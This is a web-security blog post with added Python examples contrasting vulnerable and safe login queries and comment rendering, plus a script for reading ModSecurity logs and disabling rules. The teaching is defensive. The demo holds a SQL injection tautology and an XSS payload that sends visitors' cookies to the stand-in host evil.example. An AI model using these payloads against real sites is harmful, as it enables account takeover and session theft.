Running a website these days is a complicated thing if you want to do it properly and are serious about it. Let's start with why you should care how your website looks. You don't want a website that looks like a dinosaur fossil, right? That means it needs extra features: RSS feeds, social sharing buttons that let readers post your content to Digg, Newsvine and the like, a Web 2.0 style in general, comment forms for discussion where they are appropriate, and more. How a website "looks and behaves" is a big subject, and you can bet that digging further into it leads to hours of reading material and hands-on practice.
An even more complicated matter that you should care about when running a website is running it securely. What does that mean? Unfortunately, once your website behaves in a modern (Web 2.0) way, you have to watch out for remote evildoers. Why? Modern websites contain more forms and functions that let visitors interact with your website's database, and every comment form, search box and login page that passes visitor input to the database or echoes it back into a page is an entry point. If you have no clue about website security, hackers and script kiddies can easily take bites out of your cake: your website and its database. Look up these terms for a start: SQL injection, XSS (cross-site scripting), comment spam, registration spam, and web application vulnerabilities in general.
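To make the first two of those terms concrete, here is an added Python example (my own, not code from the original post) that puts a login query built by string concatenation next to its parameterized form, and a comment rendered raw next to an HTML-escaped one. The users table, the admin account and the attacker inputs are constructed for the demonstration; the same mistakes in PHP, Perl or any other language behave the same way.

```python
import html
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory database standing in for a website's user table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'correct horse')")
    return conn


def login_vulnerable(conn: sqlite3.Connection, name: str, password: str) -> bool:
    # SQL injection: the visitor's text is pasted into the SQL, so quotes and
    # operators in it become part of the query instead of data.
    query = ("SELECT 1 FROM users WHERE name = '%s' AND password = '%s'"
             % (name, password))
    return conn.execute(query).fetchone() is not None


def login_safe(conn: sqlite3.Connection, name: str, password: str) -> bool:
    # Parameterized query: the driver sends the values separately from the
    # SQL text, so a quote in the password is only ever compared as a quote.
    query = "SELECT 1 FROM users WHERE name = ? AND password = ?"
    return conn.execute(query, (name, password)).fetchone() is not None


def render_comment_vulnerable(comment: str) -> str:
    # XSS: whatever the visitor typed is inserted straight into the page.
    return "<p>%s</p>" % comment


def render_comment_safe(comment: str) -> str:
    # Output escaping turns <, >, &, " and ' into entities, so the browser
    # shows the text instead of executing it.
    return "<p>%s</p>" % html.escape(comment, quote=True)


# Constructed attacker inputs: a classic tautology and a cookie-stealing script.
INJECTION = "' OR '1'='1"
XSS = "<script>document.location='http://evil.example/?c='+document.cookie</script>"


def demo() -> dict:
    """Run both attacks against both versions and report what happened."""
    conn = make_db()
    return {
        "vulnerable_bypassed": login_vulnerable(conn, "admin", INJECTION),
        "safe_bypassed": login_safe(conn, "admin", INJECTION),
        "vulnerable_html": render_comment_vulnerable(XSS),
        "safe_html": render_comment_safe(XSS),
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print("%-20s %s" % (key, value))
```

With the injected password the vulnerable query becomes `... AND password = '' OR '1'='1'`, which is true for every row, so the attacker is logged in as admin without knowing the password; the parameterized version simply fails the login. Likewise the raw comment ships a working script tag to every reader, while the escaped one displays it as text.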
The list of appropriate ways to run a website securely and attractively can be really long. It's best to leave a complete treatment of the tutorials, tips and tricks on this subject to the technical books you can pick up at a bookstore near you, or download digitally from legitimate online sources.
Let's talk about prevention! I think prevention is better than cure, but you need both to sleep well at night. I will only rant about prevention in this post, and my rant should not be your complete guide to web security, because I am merely scratching the surface of the topic. When installing a web application on your website, it's best to choose a well-written (well-coded) one. All web applications have bugs, some of which introduce security risks for the site's owner, which is why you should research a specific web application before deploying it. Some open source web applications are successful precisely because huge communities support them: those communities release fixes for security holes quickly and answer hard questions on the support forums. Choose a web application with a large, active support community, and keep it updated, since a patch you never apply protects nothing. If it's an in-house (custom-made) web application, let's hope you have good developers ready whenever there is an emergency. Even better, learn some programming yourself.
The best prevention of all, I would say, is to install ModSecurity if you are running the Apache web server. ModSecurity lets you write security rules that stop malicious requests before they reach your web applications. With the right rules, ModSecurity can block SQL injection, XSS attacks, automated bot activity and a lot more. It's a firewall for your web applications (a web application firewall, or WAF). Keep in mind that it inspects requests against patterns, so it catches known attack shapes; it is a layer in front of your applications, not a replacement for fixing the code behind it.
ModSecurity's rules are complicated, and if you're brand new to running a website, I think you should ask for professional help. If you are a daredevil, you can always install ModSecurity yourself, grab the excellent rule sets from GotRoot.com and apply them. One thing you should know about ModSecurity: it is excellent at stopping malicious requests from reaching your web applications, but it can also break your website's functionality if you configure it wrongly. Why? Some rules are too strict, and with those rules in place, legitimate features of your website may stop working because ModSecurity is blocking them. A safe way to start is to run the engine in detection-only mode (SecRuleEngine DetectionOnly), which logs what would have been blocked without actually blocking it. Watch ModSecurity's log carefully to see which rule is preventing which feature from functioning; each entry names the rule file, the rule id, the message and the request URI. Deleting that specific rule is one quick fix; a cleaner one is to disable it by id with SecRuleRemoveById in your own configuration, ideally scoped to the affected path, so your change survives the next rule-set update.
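Added example, not part of the original post and not ModSecurity's own tooling: a small Python script that reads ModSecurity 2.x entries from the Apache error log, counts which rule id blocked which URI, and prints an Apache configuration stanza that disables just that rule for just that path. The log lines, rule ids 900001 to 900003, file paths and URIs below are constructed placeholders; the field layout ([id "..."], [msg "..."], [uri "..."]) and the SecRuleRemoveById directive are real.

```python
import re
from collections import Counter

# Constructed sample lines in the ModSecurity 2.x Apache error-log format.
# Rule ids, paths, hostnames and client addresses are placeholders.
SAMPLE_LOG = """\
[Tue Mar 06 11:22:33 2012] [error] [client 192.0.2.7] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)<script" at ARGS:comment. [file "/etc/modsecurity/rules/xss.conf"] [line "12"] [id "900001"] [msg "XSS Attack"] [uri "/wp-comments-post.php"]
[Tue Mar 06 11:23:01 2012] [error] [client 192.0.2.8] ModSecurity: Warning. Pattern match "select.*from" at ARGS:q. [file "/etc/modsecurity/rules/sqli.conf"] [line "40"] [id "900002"] [msg "SQL Injection"] [uri "/search.php"]
[Tue Mar 06 11:24:10 2012] [error] [client 192.0.2.9] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)<script" at ARGS:comment. [file "/etc/modsecurity/rules/xss.conf"] [line "12"] [id "900001"] [msg "XSS Attack"] [uri "/wp-comments-post.php"]
[Tue Mar 06 11:25:45 2012] [error] [client 192.0.2.10] ModSecurity: Access denied with code 403 (phase 2). Operator GT matched 10 at ARGS_COUNT. [file "/etc/modsecurity/rules/generic.conf"] [line "5"] [id "900003"] [msg "Too many arguments"] [uri "/admin/post.php"]
"""

# The bracketed key/value fields ModSecurity appends to each log entry.
FIELD = re.compile(r'\[(id|msg|uri|file|line) "([^"]*)"\]')


def parse_line(line: str):
    """Return the bracketed fields of one ModSecurity entry, or None for other log lines."""
    if "ModSecurity:" not in line:
        return None
    fields = dict(FIELD.findall(line))
    # "Access denied" means the request was actually blocked; a "Warning."
    # entry (DetectionOnly mode, or a non-blocking rule) only logged it.
    fields["blocked"] = "Access denied" in line
    return fields


def summarize(log_text: str):
    """Count blocked requests per (rule id, uri) so the rule breaking a feature stands out."""
    blocked = Counter()
    details = {}
    for line in log_text.splitlines():
        event = parse_line(line)
        if event is None or not event["blocked"]:
            continue
        key = (event.get("id", "?"), event.get("uri", "?"))
        blocked[key] += 1
        details[key] = event
    return blocked, details


def exception_snippet(rule_id: str, uri: str) -> str:
    """Apache config that turns off one rule for one path only, leaving the rule file untouched."""
    return ('<LocationMatch "^%s$">\n    SecRuleRemoveById %s\n</LocationMatch>'
            % (re.escape(uri), rule_id))


if __name__ == "__main__":
    blocked, details = summarize(SAMPLE_LOG)
    for (rule_id, uri), count in blocked.most_common():
        d = details[(rule_id, uri)]
        print("%d block(s) by rule %s (%s) on %s, from %s line %s"
              % (count, rule_id, d.get("msg"), uri, d.get("file"), d.get("line")))
        print(exception_snippet(rule_id, uri))
        print()
```

To use it on a real server, replace SAMPLE_LOG with the contents of your Apache error log (open("/var/log/apache2/error.log").read() on Debian-style layouts; the path varies by distribution). Only "Access denied" entries are counted, because those are the ones breaking features; review the printed stanza before adding it to your own configuration, since removing a rule for a path means that path no longer gets that check.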
There is an easier way to get your website working with ModSecurity: whitelist an IP address or addresses. Be clear about what this does. REMOTE_ADDR is the address of the client making the request, so a whitelist rule switches the engine off for requests coming from that address (your own workstation, a monitoring host, or the server itself when it fetches its own pages, as some blog platforms do for scheduled tasks), and every request from that address then goes uninspected. For example, to trust 111.222.333.444 (a placeholder used in this post, not a valid address, since real octets are 255 or less), you would add

SecRule REMOTE_ADDR "^111\.222\.333\.444$" "id:1000,phase:1,nolog,allow"

to your ModSecurity configuration file(s). Note the escaped dots: in a regular expression an unescaped dot matches any character, so escape them to match the address literally. The id action is required on every rule since ModSecurity 2.7 (pick a number that does not collide with your rule set), and the @ipMatch operator, which takes addresses and CIDR ranges directly, is a less error-prone alternative to a regex for this job. Where the main configuration file lives depends on the system you are running Apache and ModSecurity on. From this main configuration file you can use the Include directive to pull in rules that live in external directories and files.